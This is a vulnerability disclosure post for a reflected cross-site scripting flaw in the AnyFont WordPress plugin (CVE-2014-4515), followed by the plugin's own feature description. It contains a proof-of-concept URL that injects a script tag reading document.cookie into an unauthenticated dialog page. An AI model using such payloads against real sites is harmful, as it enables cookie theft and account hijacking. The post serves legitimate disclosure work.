wp-plugin : anyfont – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : anyfont

 

Effected Version : 2.2.3 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

PoC:
http://localhost/wordpress/wp-content/wp-plugs/anyfont/mce_anyfont/dialog.php?text=text%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4515

 
Plugin Description :
 
AnyFont allows you to automatically set any custom TrueType or OpenType font absolutely anywhere you want on your WordPress site.

Easily embed your custom fonts directly into your web pages using the new "@font-face" CSS rule. The new and improved Font Manager now includes the option to convert fonts to all the different webfont formats with a single click(Requires free sign up at [FontServ.com](http://fontserv.com)).

CSS3 "@font-face" support means you can now embed fonts into web pages and enable everyone to see your custom fonts without using any images, Flash or JavaScript.

**Upgrade your [FontServ.com](http://fontserv.com/) account to Pro for only $16 per year!**

**Features:**

* WPMU/WordPress 3 compatible with full support for multiple sites.
* Font Manager to easily upload truetype or opentype fonts to WordPress
* Easily convert your fonts to webfont formats. (Requires free sign up at [FontServ.com](http://fontserv.com/))
* FontServ webfonts [support all the major browsers](http://fontserv.com/help/) including Internet Explorer.
* Character Map to quickly check which characters are available for each font.
* Style Management which allows an unlimited number of different styles to be created.
* Apply font shadows easily using the Style Manager.
* TinyMCE Button for quick and easy insertion of AnyFont styled text into your posts or pages.
* Image Cache for generated images plus browser caching is enabled for images to reduce page load times.
* Cache overview and management tool.
* Easy text replacement options for menus, post titles, page titles, widget titles, blog name and blog description.
* Advanced option which allows you to apply styles to any element or css selector(class name or ID).
* Image replacements are SEO compatible.
* Help icon for every single option to guide you when setting things up for the first time.
* Image Styles support either PHP4+GD or PHP5+Imagick/GD.
* Officially tested on Apache and Microsoft IIS(Windows 2008 R2 Enterprise running IIS 7), but is also known to work with nginx and various other web servers.

**Translations:**

* Belarusian - [FatCow](http://www.fatcow.com)
* Turkish
* Dutch - [WP Webshop](http://wpwebshop.com)
* German - [Maco](http://www.macozoll.de)
* Russian - [Sasha](http://forex-trader.pp.ua/)
* Ukranian - [Pavel](http://wlstyling.crimea.ua/)
* French - [Web Hub](http://www.webhostinghub.com/)
* Azerbaijani - [Bohdan Zograf](http://webhostingrating.com/)

Leave a Reply

Your email address will not be published. Required fields are marked *